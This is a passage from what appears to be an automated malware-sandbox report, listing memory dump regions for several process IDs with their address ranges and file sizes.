                              144KB

                            • memory/2356-96-0x0000000000400000-0x0000000000424000-memory.dmp

                              Filesize

                              144KB

                            • memory/3284-16-0x00007FFCC9ED0000-0x00007FFCCA991000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3284-19-0x00007FFCC9ED3000-0x00007FFCC9ED5000-memory.dmp

                              Filesize

                              8KB

                            • memory/3284-20-0x00007FFCC9ED0000-0x00007FFCCA991000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3284-21-0x00007FFCC9ED0000-0x00007FFCCA991000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3284-15-0x00007FFCC9ED0000-0x00007FFCCA991000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3284-14-0x000002A9502A0000-0x000002A9502C2000-memory.dmp

                              Filesize

                              136KB

                            • memory/3284-24-0x00007FFCC9ED0000-0x00007FFCCA991000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3284-4-0x00007FFCC9ED3000-0x00007FFCC9ED5000-memory.dmp

                              Filesize

                              8KB

                            • memory/3704-89-0x0000000000400000-0x0000000000478000-memory.dmp

                              Filesize

                              480KB

                            • memory/3704-84-0x0000000000400000-0x0000000000478000-memory.dmp

                              Filesize

                              480KB

                            • memory/3704-104-0x0000000000400000-0x0000000000478000-memory.dmp

                              Filesize

                              480KB

                            • memory/3704-87-0x0000000000400000-0x0000000000478000-memory.dmp

                              Filesize

                              480KB

                            • memory/4608-28-0x00000000054E0000-0x0000000005546000-memory.dmp

                              Filesize

                              408KB

                            • memory/4608-27-0x0000000005240000-0x0000000005262000-memory.dmp

                              Filesize

                              136KB

                            • memory/4608-49-0x0000000008C10000-0x000000000B9E8000-memory.dmp

                              Filesize

                              45.8MB

                            • memory/4608-26-0x0000000005550000-0x0000000005B78000-memory.dmp

                              Filesize

                              6.2MB

                            • memory/4608-47-0x0000000008660000-0x0000000008C04000-memory.dmp

                              Filesize

                              5.6MB

                            • memory/4608-46-0x00000000073E0000-0x0000000007402000-memory.dmp

                              Filesize

                              136KB

                            • memory/4608-45-0x0000000007450000-0x00000000074E6000-memory.dmp

                              Filesize

                              600KB

                            • memory/4608-44-0x0000000006780000-0x000000000679A000-memory.dmp

                              Filesize

                              104KB

                            • memory/4608-25-0x00000000028B0000-0x00000000028E6000-memory.dmp

                              Filesize

                              216KB

                            • memory/4608-42-0x0000000006220000-0x000000000626C000-memory.dmp

                              Filesize

                              304KB

                            • memory/4608-41-0x00000000061E0000-0x00000000061FE000-memory.dmp

                              Filesize

                              120KB

                            • memory/4608-39-0x0000000005BF0000-0x0000000005F44000-memory.dmp

                              Filesize

                              3.3MB

                            • memory/4608-29-0x0000000005B80000-0x0000000005BE6000-memory.dmp

                              Filesize

                              408KB

                            • memory/4608-43-0x0000000007A30000-0x00000000080AA000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/4792-217-0x00000000219C0000-0x00000000219D9000-memory.dmp

                              Filesize

                              100KB

                            • memory/4792-75-0x0000000020EA0000-0x0000000020ED4000-memory.dmp

                              Filesize

                              208KB

                            • memory/4792-256-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/4792-71-0x0000000020EA0000-0x0000000020ED4000-memory.dmp

                              Filesize

                              208KB

                            • memory/4792-74-0x0000000020EA0000-0x0000000020ED4000-memory.dmp

                              Filesize

                              208KB

                            • memory/4792-216-0x00000000219C0000-0x00000000219D9000-memory.dmp

                              Filesize

                              100KB

                            • memory/4792-435-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/4792-441-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/4792-64-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/4792-198-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/4792-213-0x00000000219C0000-0x00000000219D9000-memory.dmp

                              Filesize

                              100KB

                            • memory/4792-438-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/4792-365-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/4792-430-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/4792-433-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/4940-85-0x0000000000400000-0x0000000000462000-memory.dmp

                              Filesize

                              392KB

                            • memory/4940-110-0x0000000000400000-0x0000000000462000-memory.dmp

                              Filesize

                              392KB

                            • memory/4940-90-0x0000000000400000-0x0000000000462000-memory.dmp

                              Filesize

                              392KB